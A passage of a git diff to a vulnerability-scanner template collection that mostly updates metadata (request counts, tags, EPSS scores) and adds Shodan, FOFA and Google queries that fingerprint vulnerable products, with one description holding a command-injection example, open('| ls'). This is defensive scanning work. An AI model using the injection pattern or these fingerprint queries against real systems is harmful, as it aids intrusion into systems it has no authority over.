server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS). reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-versioning.yaml b/cloud/aws/s3/s3-versioning.yaml index 30531fed21..d43ca32d56 100644 --- a/cloud/aws/s3/s3-versioning.yaml +++ b/cloud/aws/s3/s3-versioning.yaml @@ -7,6 +7,8 @@ info: Verifies that Amazon S3 buckets have object versioning enabled, providing a safeguard for recovering overwritten or deleted objects reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/sns/sns-topic-public-accessible.yaml b/cloud/aws/sns/sns-topic-public-accessible.yaml index 5cc304a527..fac24e4858 100644 --- a/cloud/aws/sns/sns-topic-public-accessible.yaml +++ b/cloud/aws/sns/sns-topic-public-accessible.yaml @@ -8,6 +8,8 @@ info: This template checks if Amazon SNS topics are configured to prevent public access via topic policies. reference: - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,sns,aws-cloud-config flow: | diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml index 1e8bf93789..df1b38b564 100644 --- a/cloud/aws/vpc/nacl-open-inbound.yaml +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -11,8 +11,9 @@ info: Restrict Network ACL inbound rules to only allow necessary IP ranges and ports as per the Principle of Least Privilege. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml index b7483da1ef..860dbd138c 100644 --- a/cloud/aws/vpc/nacl-outbound-restrict.yaml +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -11,8 +11,9 @@ info: Modify NACL outbound rules to limit traffic to only the ports required for legitimate business needs. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml index 308cb0ab0d..740e32638a 100644 --- a/cloud/aws/vpc/nat-gateway-usage.yaml +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -11,8 +11,9 @@ info: Replace NAT instances with Amazon Managed NAT Gateway to ensure high availability and scalability in your VPC network. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-nat-gateway.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml index 11da6b63b4..9be1fe9293 100644 --- a/cloud/aws/vpc/unrestricted-admin-ports.yaml +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -11,8 +11,9 @@ info: Restrict access to ports 22 and 3389 to trusted IPs or IP ranges to adhere to the Principle of Least Privilege (POLP). reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml index 6fe8d3c737..73c01bc888 100644 --- a/cloud/aws/vpc/vpc-endpoint-exposed.yaml +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -11,8 +11,9 @@ info: Update the VPC endpoint's policy to restrict access only to authorized entities and ensure all requests are signed. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints-access.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml index c2dcfb6728..ca886cf418 100644 --- a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -11,8 +11,9 @@ info: Implement VPC endpoints for supported AWS services to secure and optimize connectivity within your VPC, minimizing external access risks. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml index ca6474d99e..f4343771a9 100644 --- a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -11,8 +11,9 @@ info: Enable VPC Flow Logs in the AWS Management Console under the VPC dashboard to collect data on IP traffic going to and from network interfaces in your VPC. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml index 1e7ddb8308..83f8318d97 100644 --- a/cloud/aws/vpc/vpn-tunnel-down.yaml +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -11,8 +11,9 @@ info: Monitor VPN tunnel status via the AWS Management Console or CLI. If a tunnel is DOWN, troubleshoot according to AWS documentation and ensure redundancy by configuring multiple tunnels. reference: - https://docs.aws.amazon.com/vpn/latest/s2svpn/VPNConnections.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpn,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml index 202edfdb07..85240d75b9 100644 --- a/cloud/enum/azure-db-enum.yaml +++ b/cloud/enum/azure-db-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,cloud-enum,azure + tags: cloud,enum,cloud-enum,azure,dns self-contained: true diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index bad214eb39..20d09ff55a 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,azure,fuzz,enum + tags: cloud,cloud-enum,azure,fuzz,enum,dns self-contained: true diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index 30b7130474..20e20ec8fa 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical + tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project self-contained: true code: diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index b92022c2ba..f0c37464f1 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev + tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project self-contained: true code: diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 26688faba5..e6601058e6 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -29,6 +29,7 @@ info: max-request: 2 vendor: canonical product: ubuntu_linux + shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux" tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical self-contained: true diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 4c28f685ab..cb5cb03a00 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -17,14 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49105 cwe-id: CWE-287 - epss-score: 0.21237 - epss-percentile: 0.96302 + epss-score: 0.18166 + epss-percentile: 0.96172 cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: owncloud product: owncloud - shodan-query: title:"owncloud" + shodan-query: + - title:"owncloud" + - http.title:"owncloud" + fofa-query: title="owncloud" + google-query: intitle:"owncloud" tags: cve,cve2023,code,owncloud,auth-bypass variables: username: admin diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index d96f5b0e87..3a9fa8efa0 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev + tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev,gnu self-contained: true code: diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index e7a19e0257..e05515ac86 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,linux,privesc,local + tags: cve,cve2023,code,glibc,linux,privesc,local,gnu self-contained: true code: diff --git a/code/cves/2024/CVE-2024-3094.yaml b/code/cves/2024/CVE-2024-3094.yaml index 413ca3d822..0ebb934f0c 100644 --- a/code/cves/2024/CVE-2024-3094.yaml +++ b/code/cves/2024/CVE-2024-3094.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: tukaani product: xz - tags: cve,cve2024,local,code,xz,backdoor + tags: cve,cve2024,local,code,xz,backdoor,tukaani self-contained: true code: diff --git a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml index 82bc981104..b4a78efc79 100644 --- a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml +++ b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 3 - tags: code,linux,sqlite3,privesc,local + tags: code,linux,sqlite3,privesc,local,sqli self-contained: true code: diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index b698a2abd7..ec7011c9d2 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2018-19518 cwe-id: CWE-88 metadata: + max-request: 1 confidence: tenative tags: imap,dast,vulhub,cve,cve2018,rce,oast,php diff --git a/dast/cves/2021/CVE-2021-45046.yaml b/dast/cves/2021/CVE-2021-45046.yaml index 495aa6d985..3d7b35a2cf 100644 --- a/dast/cves/2021/CVE-2021-45046.yaml +++ b/dast/cves/2021/CVE-2021-45046.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2021-45046 cwe-id: CWE-502 metadata: + max-request: 1 confidence: tenative tags: cve,cve2021,rce,oast,log4j,injection,dast diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 0e37bfb162..f39e250811 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -6,19 +6,20 @@ info: severity: critical description: | Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. reference: - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om - http://www.openwall.com/lists/oss-security/2022/10/13/4 - http://www.openwall.com/lists/oss-security/2022/10/18/1 - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ - https://github.com/silentsignal/burp-text4shell - remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-42889 cwe-id: CWE-94 metadata: + max-request: 1 confidence: tenative tags: cve,cve2022,rce,oast,text4shell,dast diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml index f285a8755e..2b4178e80d 100644 --- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -5,11 +5,13 @@ info: author: pdteam,geeknik severity: high description: | - Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. - Successful exploitation could lead to arbitrary command execution on the system. + Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. + Successful exploitation could lead to arbitrary command execution on the system. reference: - https://portswigger.net/research/hunting-asynchronous-vulnerabilities - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md + metadata: + max-request: 4 tags: cmdi,oast,dast,blind,polyglot variables: diff --git a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml index ab8e383ba3..cddf72581c 100644 --- a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml +++ b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml @@ -5,10 +5,12 @@ info: author: pdteam severity: high description: | - Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. + Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. reference: - https://bishopfox.com/blog/ruby-vulnerabilities-exploits - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ + metadata: + max-request: 1 tags: cmdi,oast,dast,blind,ruby,rce variables: diff --git a/dast/vulnerabilities/crlf/cookie-injection.yaml b/dast/vulnerabilities/crlf/cookie-injection.yaml index 026d77fdeb..a07398d49e 100644 --- a/dast/vulnerabilities/crlf/cookie-injection.yaml +++ b/dast/vulnerabilities/crlf/cookie-injection.yaml @@ -7,6 +7,8 @@ info: reference: - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm + metadata: + max-request: 1 tags: reflected,dast,cookie,injection variables: diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml index 194517a9a4..2a15f6c2e7 100644 --- a/dast/vulnerabilities/crlf/crlf-injection.yaml +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -4,6 +4,8 @@ info: name: CRLF Injection author: pdteam severity: low + metadata: + max-request: 41 tags: crlf,dast http: diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml index 93df95d6a7..85eb10c2d5 100644 --- a/dast/vulnerabilities/lfi/lfi-keyed.yaml +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -6,6 +6,8 @@ info: severity: unknown reference: - https://owasp.org/www-community/attacks/Unicode_Encoding + metadata: + max-request: 25 tags: dast,pathtraversal,lfi variables: diff --git a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml index 4e18560c84..2ddfa0872c 100644 --- a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml @@ -7,6 +7,8 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion + metadata: + max-request: 46 tags: lfi,dast,linux http: diff --git a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml index 5a18f37034..41eac97775 100644 --- a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml @@ -4,6 +4,8 @@ info: name: Local File Inclusion - Windows author: pussycat0x severity: high + metadata: + max-request: 39 tags: lfi,windows,dast http: diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 8c36036bcc..cc28754ad8 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -4,6 +4,8 @@ info: name: Open Redirect Detection author: princechaddha,AmirHossein Raeisi severity: medium + metadata: + max-request: 1 tags: redirect,dast http: diff --git a/dast/vulnerabilities/rfi/generic-rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml index 46cb090042..58f33dd8cf 100644 --- a/dast/vulnerabilities/rfi/generic-rfi.yaml +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://www.invicti.com/learn/remote-file-inclusion-rfi/ + metadata: + max-request: 1 tags: rfi,dast,oast http: diff --git a/dast/vulnerabilities/sqli/sqli-error-based.yaml b/dast/vulnerabilities/sqli/sqli-error-based.yaml index c0b234e0a4..095b54444d 100644 --- a/dast/vulnerabilities/sqli/sqli-error-based.yaml +++ b/dast/vulnerabilities/sqli/sqli-error-based.yaml @@ -8,6 +8,8 @@ info: Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . + metadata: + max-request: 3 tags: sqli,error,dast http: diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index 2c4d20d9e0..61435e1722 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -4,6 +4,8 @@ info: name: Blind SSRF OAST Detection author: pdteam severity: medium + metadata: + max-request: 3 tags: ssrf,dast,oast http: diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml index 14f81d9668..ee4474d3a4 100644 --- a/dast/vulnerabilities/ssrf/response-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py + metadata: + max-request: 12 tags: ssrf,dast http: diff --git a/dast/vulnerabilities/ssti/reflection-ssti.yaml b/dast/vulnerabilities/ssti/reflection-ssti.yaml index fae9311f3c..a5d82890a5 100644 --- a/dast/vulnerabilities/ssti/reflection-ssti.yaml +++ b/dast/vulnerabilities/ssti/reflection-ssti.yaml @@ -7,6 +7,8 @@ info: reference: - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update + metadata: + max-request: 14 tags: ssti,dast variables: diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index bbb658c851..fb6c54ec24 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -4,6 +4,8 @@ info: name: Reflected Cross Site Scripting author: pdteam severity: medium + metadata: + max-request: 1 tags: xss,rxss,dast variables: diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index 26635ebaa5..8098d4881c 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -6,6 +6,8 @@ info: severity: medium reference: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + metadata: + max-request: 2 tags: dast,xxe variables: diff --git a/dns/bimi-detect.yaml b/dns/bimi-detect.yaml index 3a3c25aae2..9753003759 100644 --- a/dns/bimi-detect.yaml +++ b/dns/bimi-detect.yaml @@ -1,15 +1,16 @@ id: bimi-record-detect -info: - name: BIMI Record - Detection - author: rxerium - severity: info - description: | - A BIMI record was detected - reference: - - https://postmarkapp.com/blog/what-the-heck-is-bimi - tags: dns,bimi - +info: + name: BIMI Record - Detection + author: rxerium + severity: info + description: | + A BIMI record was detected + reference: + - https://postmarkapp.com/blog/what-the-heck-is-bimi + metadata: + max-request: 1 + tags: dns,bimi dns: - name: "{{FQDN}}" type: TXT diff --git a/file/keys/credential-exposure-file.yaml b/file/keys/credential-exposure-file.yaml index 25e80b108c..80174457dd 100644 --- a/file/keys/credential-exposure-file.yaml +++ b/file/keys/credential-exposure-file.yaml @@ -5,7 +5,7 @@ info: author: Sy3Omda,geeknik,forgedhallpass,ayadi severity: unknown description: Check for multiple keys/tokens/passwords hidden inside of files. - tags: exposure,token,file,disclosure + tags: exposure,token,file,disclosure,keys # Extract secrets regex like api keys, password, token, etc ... for different services. # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index d842083a34..4b97dda33f 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: smartbear product: swagger_ui - shodan-query: http.component:"Swagger" + shodan-query: + - http.component:"Swagger" + - http.component:"swagger" + - http.favicon.hash:"-1180440057" fofa-query: icon_hash="-1180440057" tags: headless,cve,cve2018,swagger,xss,smartbear headless: diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml index 0da0eff55f..837728ef56 100644 --- a/headless/webpack-sourcemap.yaml +++ b/headless/webpack-sourcemap.yaml @@ -13,8 +13,9 @@ info: reference: - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage - tags: javascript,webpack,sourcemaps - + metadata: + max-request: 9 + tags: javascript,webpack,sourcemaps,headless headless: - steps: - args: diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index 832b701428..bbc76106c0 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -2,16 +2,15 @@ id: CNVD-2017-06001 info: name: Dahua DSS - SQL Injection - severity: high author: napgh0st,ritikchaddha + severity: high reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001 metadata: - max-request: 1 verified: true - fofa-query: app="dahua-DSS" + max-request: 2 + fofa-query: "app=\"dahua-DSS\"" tags: cnvd,cnvd2017,sqli,dahua - variables: num: "999999999" diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index 5db72977bb..f73a44bd57 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -15,9 +15,8 @@ info: cvss-score: 10 cwe-id: CWE-77 metadata: - max-request: 1 + max-request: 2 tags: cnvd,cnvd2019,rce,catfishcms - flow: http(1) && http(2) http: diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 8470e08000..a34dfd2c7d 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -29,7 +29,10 @@ info: max-request: 1 vendor: cisco product: ios - shodan-query: product:"Cisco IOS http config" && 200 + shodan-query: + - product:"Cisco IOS http config" && 200 + - product:"cisco ios http config" + - cpe:"cpe:2.3:o:cisco:ios" tags: cve,cve2001,cisco,ios,auth-bypass http: diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0422de46ab..a16058ffa9 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -20,14 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2002-1131 cwe-id: CWE-80 - epss-score: 0.06018 - epss-percentile: 0.92781 + epss-score: 0.04774 + epss-percentile: 0.92677 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: squirrelmail product: squirrelmail - shodan-query: http.title:"squirrelmail" + shodan-query: + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" tags: cve,cve2002,edb,xss,squirrelmail diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 1293c3640f..409d18f673 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.83623 + epss-percentile: 0.85053 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index cf64ff3ab9..293da33ddf 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: sap product: sap_web_application_server - shodan-query: html:"SAP Business Server Pages Team" + shodan-query: + - html:"SAP Business Server Pages Team" + - http.html:"sap business server pages team" fofa-query: body="sap business server pages team" tags: cve,cve2005,sap,redirect,business,xss diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 4cc42895e6..009068efb5 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: squirrelmail product: squirrelmail - shodan-query: http.title:"squirrelmail" + shodan-query: + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" tags: cve,cve2006,lfi,squirrelmail,edb diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 913a3cbfcd..a6fb965688 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -29,10 +29,15 @@ info: max-request: 1 vendor: alcatel-lucent product: omnipcx - shodan-query: title:"OmniPCX for Enterprise" - fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise" + shodan-query: + - title:"OmniPCX for Enterprise" + - http.title:"omnipcx for enterprise" + fofa-query: + - app="Alcatel_Lucent-OmniPCX-Enterprise" + - app="alcatel_lucent-omnipcx-enterprise" + - title="omnipcx for enterprise" google-query: intitle:"omnipcx for enterprise" - tags: cve,cve2007,kev,rce,alcatel + tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent http: - method: GET diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 45c71789e7..24f9121dbb 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -20,14 +20,17 @@ info: cvss-score: 4.3 cve-id: CVE-2007-5728 cwe-id: CWE-79 - epss-score: 0.02361 - epss-percentile: 0.88734 + epss-score: 0.0153 + epss-percentile: 0.87042 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin - shodan-query: http.title:"phpPgAdmin" + shodan-query: + - http.title:"phpPgAdmin" + - http.title:phppgadmin + - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin tags: 